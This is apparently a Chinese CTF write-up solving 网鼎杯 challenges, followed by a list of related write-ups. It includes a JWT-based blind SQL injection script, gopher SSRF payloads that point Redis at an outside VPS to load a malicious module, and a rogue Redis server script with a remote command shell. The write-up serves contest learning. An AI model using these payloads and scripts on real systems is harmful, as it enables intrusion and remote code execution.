查看JS,在JS中找到p14.php,直接copy下来console执行,输入战队的token就可以了

js_on

顺手输入一个 admin admin,看到下面的信息

欢迎admin
这里是你的信息:key:xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6

第一步想的是二次注入,但是一直被嘲讽,出题人素质有待加强,然后重新捋一遍思路,是不是命令注入,稍微测试了一下,感觉不对路,重新回过头,提示的这个key很明显是 jwt 的key,然后猜测二次注入的部分是不是在token部分,结果二次注入没发现,倒是发现在 token处存在布尔注入,如果为真 news会返回你输入的内容,如果为假,则返回 ???no message

脚本

# coding=utf-8

import jwt

import requests

import re

requests.packages.urllib3.disable_warnings()

key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"

url = "http://84f801d8da46417d9747f9bb2f8187b963c126676ca644fd.cloudgame1.ichunqiu.com/index.php"

proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}

# info = jwt.decode("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuZXdzIjoia2V5OnhSdCpZTURxeUNDeFl4aTlhQExnY0dwbm1NMlg4aSY2In0.EpNdctJ5Knu4ZkRcatsyMOxas1QgomB0Z49qb7_eoVg",key,algorithms=['HS256'])

# if info:

    # print(info)

# payloadTmpl = "i'/**/or/**/ascii(mid(database(),{},1))>{}#"

# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(sc<a>hema_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.S<a>CHEMATA),{},1))>{}#"

# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(ta<a>ble_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.t<a>ables/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"

# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(col<a>umn_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.c<a>olumns/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"

payloadTmpl = "i'/**/or/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"

def half_interval():

    result = ""

    for i in range(1,45):

        min = 32

        max = 127

        while abs(max-min) > 1:

            mid = (min + max)//2

            payload = payloadTmpl.format(i,mid)

            jwttoken = {

                "user": payload,

                "news": "success"

            }

            payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")

            # print(payload)

            cookies = dict(token=str(payload))

            res = requests.get(url,cookies=cookies,proxies=proxies)

            if re.findall("success", res.text) != []:

                min = mid

            else:

                max = mid

        result += chr(max)

        print(result)

if __name__ == "__main__":

    half_interval()

    # payload = payloadTmpl.format(1,32)

    # jwttoken = {

    #     "user": payload,

    #     "news": "success"

    # }

    # print(jwttoken)

    # payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")

    # print(payload)

    # cookies = dict(token=str(payload))

    # res = requests.get(url,cookies=cookies,proxies=proxies)

    # res.encoding='utf-8'

    # print(res.text)

2.png

ssrfme

刚拿到题目,想起来跟 SECCON 的题目很像,直接DNS重绑定绕过第一步

获取到hint的源码,提示ssrf 打 redis,直接写contrab在save的时候提示没权限,写shell不知道路径

一直主从复制也没成功

很坑,没权限

后来检查一下发现目录不对,转移到有权限的/tmp 下面

gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit

然后重复主从的步骤,在自己的VPS上起好了 rogue 服务器

gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252039.107.68.253%252060001%250d%250aquit

服务器监听

import socket

import time

CRLF="\r\n"

payload=open("exp.so","rb").read()

exp_filename="exp.so"

def redis_format(arr):

    global CRLF

    global payload

    redis_arr=arr.split(" ")

    cmd=""

    cmd+="*"+str(len(redis_arr))

    for x in redis_arr:

        cmd+=CRLF+"$"+str(len(x))+CRLF+x

    cmd+=CRLF

    return cmd

def redis_connect(rhost,rport):

    sock=socket.socket()

    sock.connect((rhost,rport))

    return sock

def send(sock,cmd):

    sock.send(redis_format(cmd))

    print(sock.recv(1024).decode("utf-8"))

def interact_shell(sock):

    flag=True

    try:

        while flag:

            shell=raw_input("\033[1;32;40m[*]\033[0m ")

            shell=shell.replace(" ","${IFS}")

            if shell=="exit" or shell=="quit":

                flag=False

            else:

                send(sock,"system.exec {}".format(shell))

    except KeyboardInterrupt:

        return

def RogueServer(lport):

    global CRLF

    global payload

    flag=True

    result=""

    sock=socket.socket()

    sock.bind(("0.0.0.0",lport))

    sock.listen(10)

    clientSock, address = sock.accept()

    while flag:

        data = clientSock.recv(1024)

        if "PING" in data:

            result="+PONG"+CRLF

            clientSock.send(result)

            flag=True

        elif "REPLCONF" in data:

            result="+OK"+CRLF

            clientSock.send(result)

            flag=True

        elif "PSYNC" in data or "SYNC" in data:

            result = "+FULLRESYNC " + "a" * 40 + " 1" + CRLF

            result += "$" + str(len(payload)) + CRLF

            result = result.encode()

            result += payload

            result += CRLF

            clientSock.send(result)

            flag=False

if __name__=="__main__":

    lhost="xxx.xxx.xxx.xxx"

    lport=60001

java

用 jadx 对 java.apk 反汇编

主程序逻辑并不复杂,正常的输入,以及将输入进行计算后比对

先对用户输入进行 AES 加密 ,Key 为 aes_check_key!@#,然后进行两次异或,最后 base64 编码

与 VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3进行比较

所以 crack 过程也很简单,逆回来就得到输入,但是中间卡在密钥并不是直接给的密钥,还对密钥里 'e' 和 'o'进行了替换,最终密钥为 aos_chock_koy!@#,逆回去得到flag

网鼎杯玄武组部分web题解的更多相关文章

  1. 2020网鼎杯 白虎组reverse:hero

    主函数,当bossexist的值不为0时,while循环dround()函数,循环结束输出flag outflag()函数的flag值由6段数据拼凑而成 while循环的dround()函数有三个选择 ...

  2. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhit ...

  3. CTF-i春秋网鼎杯第四场部分writeup

    CTF-i春秋网鼎杯第四场部分writeup 因为我们组的比赛是在第四场,所以前两次都是群里扔过来几道题然后做,也不知道什么原因第三场的题目没人发,所以就没做,昨天打了第四场,简直是被虐着打. she ...

  4. 刷题记录:[网鼎杯]Fakebook

    目录 刷题记录:[网鼎杯]Fakebook 一.涉及知识点 1.敏感文件泄露 2.sql注入 二.解题方法 刷题记录:[网鼎杯]Fakebook 题目复现链接:https://buuoj.cn/cha ...

  5. 网鼎杯2020 AreUSerialz

    0x00 前言 ...有一说一,赵总的BUUCTF上的这道题目并没有复现到精髓.其实感觉出题人的题目本身没有那么简单的,只不过非预期实在是太简单惹. 涉及知识点: 1.php中protected变量反 ...

  6. CTF-i春秋网鼎杯第二场misc部分writeup

    CTF-i春秋网鼎杯第二场misc部分writeup 套娃 下载下来是六张图片 直接看并没有什么信息 一个一个查看属性 没有找到有用信息 到winhexv里看一下 都是标准的png图片,而且没有fla ...

  7. CTF-i春秋网鼎杯第一场misc部分writeup

    CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...

  8. 2020 网鼎杯wp

    2020 网鼎杯WP 又是划水的一天,就只做出来4题,欸,还是太菜,这里就记录一下做出的几题的解题记录 AreUSerialz 知识点:反序列化 打开链接直接给出源码 <?php include ...

  9. [网鼎杯 2018]Comment

    [网鼎杯 2018]Comment 又遇到了一道有意思的题目,还是比较综合的,考的跟之前有一道很相像,用的还是二次注入. 因为找不到登陆点的sql注入,所以扫了一下源码,发现是存在git泄露的. [2 ...

随机推荐

  1. ReentrantReadWriteLock及共享锁的实现

    介绍 ReentrantReadWriteLock是j.u.c包下提供的ReadWriteLock接口的实现. ReadWriteLock作为读写锁,提供了返回读锁和返回写锁两个方法. /** * 读 ...

  2. 分布式锁(redis/mysql)

    单台机器所能承载的量是有限的,用户的量级上万,基本上服务都会做分布式集群部署.很多时候,会遇到对同一资源的方法.这时候就需要锁,如果是单机版的,可以利用java等语言自带的并发同步处理.如果是多台机器 ...

  3. ip地址与运算 ipcalc命令

    http://man.linuxde.net/ipcalc 转载于:https://blog.51cto.com/sonlich/2064133

  4. Hardware Introduction

    计算机硬件组成可以概括为下图: CPU CPU生产商主要是Intel和AMD. Intel的产品主要有四种: Celeron(赛扬):低端处理器 Pentium(奔腾):比赛扬强,比酷睿弱 Xeon( ...

  5. 解决Visual Studio (VS) 插件下载缓慢

    1.关闭IPV6协议 因为如果都支持IPV6协议,会自动使用IPV6下载扩展. 因为IPV6还没有建立完善,所以可能会比较慢. 百度经验:怎样关闭IPV6协议 2.给IPV6添加DNS 百度: 240 ...

  6. js和jq的获取焦点失去焦点写法

  7. maven项目变成web项目

    具体步骤如图所示: 第一步:建议一个Maven Webapp项目  第二步:右击项目,选择属性,找到project facets,点击tuntimes标签选择apache tomcat v6.0选中P ...

  8. LeetCode--LinkedList--206. Reverse Linked List(Easy)

    206. Reverse Linked List(Easy) 题目地址https://leetcode.com/problems/reverse-linked-list/ Reverse a sing ...

  9. [CodeForces 300D Painting Square]DP

    http://codeforces.com/problemset/problem/300/D 题意:每一次操作可以选一个正方形,令边长为n,如果n为奇数那么可以从中间画一个十字,分成4个大小相等的边长 ...

  10. FastDFS安装(mac)|文件存储方案

    目录 FastDFS安装(mac)|文件存储方案 1 FastDFS介绍 1.1 FastDFS架构 1.2 工作原理实例介绍 1.3 FastDFS上传和下载流程 1.4 FastDFS文件索引 2 ...